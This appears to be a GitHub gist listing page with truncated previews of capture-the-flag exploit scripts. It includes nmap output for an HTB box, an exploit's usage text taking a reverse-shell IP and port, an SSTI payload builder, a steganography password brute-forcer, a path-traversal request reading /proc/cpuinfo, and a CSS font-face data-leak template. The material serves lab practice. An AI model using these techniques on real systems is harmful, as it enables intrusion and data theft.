kali@kali:/home/kali/Desktop/HTB/box/Sizzle $ nmap -p- -v -sVC -oA nmap/full 10.10.10.103
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
"""Rusta Rhymes - Flag4All - Exploit | |
Usage: | |
exploit.py <url> <revshell_ip> <revshell_port> [--handler] | |
Options: | |
-h --help Show this screen. | |
--handler Automaticly setup a pwncat-cs handler on defined port |
My app is faulty can you get the flag?? https://smug.flag4all.sh Format du flag : flag{xxx}
app/app.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import requests | |
import pgpy | |
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm | |
from urllib3.exceptions import InsecureRequestWarning | |
import base64 | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
def createPGPKeysPayload(ssti_payload): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import subprocess | |
import threading | |
import sys | |
compressed = True | |
def try_password(threads_i, i, password, steg_file): | |
try: | |
print(' '*74+'\r'+f"[{i}] Thread {threads_i} try password : {password}", end='\r') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys, threading, requests | |
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd' | |
cookie = {'SESSA0': 'a'} | |
# find nginx worker processes | |
r = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie) | |
cpus = r.text.count('processor') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
charset = string.ascii_uppercase + string.digits | |
template = """ | |
@font-face{ | |
font-family: def; | |
src: url(/static/fonts/Georgia.ttf); | |
} | |
@font-face{ | |
font-family: poc; | |
src: url(/static/fonts/GeorgiaBold.ttf); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import requests | |
import string | |
import random | |
import sys | |
from urllib3.util import SKIP_HEADER | |
from collections import OrderedDict | |
import subprocess | |
from threading import Thread | |
import socket |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import requests | |
import os | |
import subprocess | |
import asyncio | |
import threading | |
import netifaces | |
import smtpd | |
import asyncore |
NewerOlder